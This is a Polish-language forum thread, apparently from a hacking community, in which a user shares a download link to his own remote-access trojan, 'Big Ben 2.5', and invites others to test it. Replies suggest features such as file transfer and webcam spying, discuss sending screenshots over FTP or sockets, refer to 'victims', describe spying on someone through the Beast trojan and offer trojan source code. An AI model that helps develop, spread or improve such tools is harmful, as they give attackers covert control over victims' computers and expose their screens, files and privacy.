Big Ben 2.5 by BoBi

bobikrk

Użytkownik
Dołączył
Październik 24, 2004
Posty
145
Macie tu mojego trojana Big Ben 2.5 nowa wersja, stestujcie oceńcie i napiszcie co by dodać
<


http://195.150.77.165/~serwer/BigBen%202.5.rar
 

Eltrial

Użytkownik
Dołączył
Kwiecień 27, 2004
Posty
325
$ dlugo mi sie sciaga, ale to moj problem (pozatym jakies problemy)
$ niepodoba mi sie "szata graficzna"
$ brak pobierania/wysylania plikow a to przeciez jedna z najwazniejszych opcji
$ brak opcji usuwania serwera z komputera !
$ nic nowego

IMHO
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Wrzuć program na iny serwer bo az mnie rwie ;] 27 minut
<
musze czekać zeby sie zassał... ale i tak poczekam
<
 

kiela

Użytkownik
Dołączył
Czerwiec 21, 2004
Posty
230
grunt ze napisales i ze chyba dziala bo nie sprawdzalem w ten sposub uczysz sie programowac i to jest najwazniejsze przynajmniej w moim wypadku tak jest
<
 

bobikrk

Użytkownik
Dołączył
Październik 24, 2004
Posty
145
pewnie ze sie ucze, coraz wiecej rozumiem itp. a pozatym z czasem bedzie wzbogacany o nowe funkcje, takze pomalu do przodu
<
<
 

BBOYMARIO

Użytkownik
Dołączył
Kwiecień 26, 2005
Posty
105
chyba coś screen niedziała.
Jak zrobiłeś przesyłanie screena??
Przez sockety czy ftp??
 

bobikrk

Użytkownik
Dołączył
Październik 24, 2004
Posty
145
screen dziala tylko jest na wolnym ftp z czasem to poprawie, screen jest na ftp na socketach indy
smile.gif
 

BBOYMARIO

Użytkownik
Dołączył
Kwiecień 26, 2005
Posty
105
wiesz co , ja też tak zrobiłem ale jak z tego trojana by korzystało kilka osób w tej samej chwili to by sie screeny mogy pomieszać.
Chyba że każdy ma inną nazwe
 

bobikrk

Użytkownik
Dołączył
Październik 24, 2004
Posty
145
co do ftp to jaki poleciacie server?? znacie jakieś dobre i szybkie ftpki?? :)
 

Eltrial

Użytkownik
Dołączył
Kwiecień 27, 2004
Posty
325
z darmowych czy platnych?
jezeli z tych drugich a szykuje ci sie jakis duzy projekt to moge pomoc
PW :-D
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848

Kazuya

Użytkownik
Dołączył
Sierpień 23, 2004
Posty
183
Originally posted by Kornik52+--><div class='quotetop'>CYTAT(Kornik52)</div>
Originally posted by Kazuya@
<!--QuoteBegin-bobikrk

Macie tu mojego trojana Big Ben 2.5 nowa wersja, stestujcie oceńcie i napiszcie co by dodać
<


http://195.150.77.165/~serwer/BigBen%202.5.rar


Bobikrk fajny trojanek jak byś dodał WebCam było by spoko :)

Jak by dodał e ale wiesz ze jak by dodał webcam to ofiara musiała by pierw posiadac kamerke internetowa?? ;][/b]

WebCam jest np: w Beast testowałem 2.06 koles nie miał kamery internetowej ( nie musi miec ) to działa na zasadzie jak by screena tylko obraz jest Ciągły tak jak u siebie na kompie a zrzut z kamery internetowej to inna sprawa tez tak można
smile.gif
 

WalgO

Użytkownik
Dołączył
Czerwiec 11, 2004
Posty
495
Originally posted by Kazuya+--><div class='quotetop'>CYTAT(Kazuya)</div>
Originally posted by Kornik52+--><div class='quotetop'>CYTAT(Kornik52)
<!--QuoteBegin-Kazuya
@
<!--QuoteBegin-bobikrk

Macie tu mojego trojana Big Ben 2.5 nowa wersja, stestujcie oceńcie i napiszcie co by dodać
<


http://195.150.77.165/~serwer/BigBen%202.5.rar


Bobikrk fajny trojanek jak byś dodał WebCam było by spoko :)

Jak by dodał e ale wiesz ze jak by dodał webcam to ofiara musiała by pierw posiadac kamerke internetowa?? ;][/b]

WebCam jest np: w Beast testowałem 2.06 koles nie miał kamery internetowej ( nie musi miec ) to działa na zasadzie jak by screena tylko obraz jest Ciągły tak jak u siebie na kompie a zrzut z kamery internetowej to inna sprawa tez tak można
smile.gif
[/b][/quote]buhehehe jak to nie musi mieć kamery ? to czym niby obraz łapie mikrofonem ? LOL ...chyba coś Ci sie pomerdało albo źle to napsialeś bo to o co Ci chyba chodzi to jest opcja screen tylko że z odżwieżaniem a kamerka to kamerka.
 

Kazuya

Użytkownik
Dołączył
Sierpień 23, 2004
Posty
183
Originally posted by WalgO+--><div class='quotetop'>CYTAT(WalgO)</div>
Originally posted by Kazuya+--><div class='quotetop'>CYTAT(Kazuya)
Originally posted by Kornik52
<!--QuoteBegin-Kazuya

Macie tu mojego trojana Big Ben 2.5 nowa wersja, stestujcie oceńcie i napiszcie co by dodać
<


http://195.150.77.165/~serwer/BigBen%202.5.rar


Bobikrk fajny trojanek jak byś dodał WebCam było by spoko :)


Jak by dodał e ale wiesz ze jak by dodał webcam to ofiara musiała by pierw posiadac kamerke internetowa?? ;]

WebCam jest np: w Beast testowałem 2.06 koles nie miał kamery internetowej ( nie musi miec ) to działa na zasadzie jak by screena tylko obraz jest Ciągły tak jak u siebie na kompie a zrzut z kamery internetowej to inna sprawa tez tak można
smile.gif
[/b]
buhehehe jak to nie musi mieć kamery ? to czym niby obraz łapie mikrofonem ? LOL ...chyba coś Ci sie pomerdało albo źle to napsialeś bo to o co Ci chyba chodzi to jest opcja screen tylko że z odżwieżaniem a kamerka to kamerka.[/b][/quote]

To nie wiem bo Ja miałem kolesia podłaczonego na Beast nie miał Kamerki a WebCam działało obraz był z pulpitu i ćiągły
 

kiela

Użytkownik
Dołączył
Czerwiec 21, 2004
Posty
230
to w takim razie nie WebCam tylko mozliwosc podlgadanie pulpitu bo WebCam'em mozesz ogladac przez kamerke osobe z ktora rozmawiasz
 

d3m0n

Użytkownik
Dołączył
Kwiecień 27, 2005
Posty
14
bobi jesteś jeban** n00bem! nie tak sie umawialismy! A trojan do dupy!
 

d3m0n

Użytkownik
Dołączył
Kwiecień 27, 2005
Posty
14
ok.... =)
Bobi zagadał do mnie kiedyś, że jak mu napisze 2 funkcje to kupi mi karte do tak taka :] (screen i menedżer plików) Napisałem a on przestał pisać a nastepnego dnia wydał swojego trojana z funkcją screen(na dodatek zrobił przez ftp chocia nie wiem co to za problem przesłać plik przez socket). A druga część mojego posta. Mało funkcji(nie ma manadera plików) design mi się również nie podoba, a z tym ftp to zjechałeś. Jak kto chce źródła to pisać :]
Pozdro
 
Do góry Bottom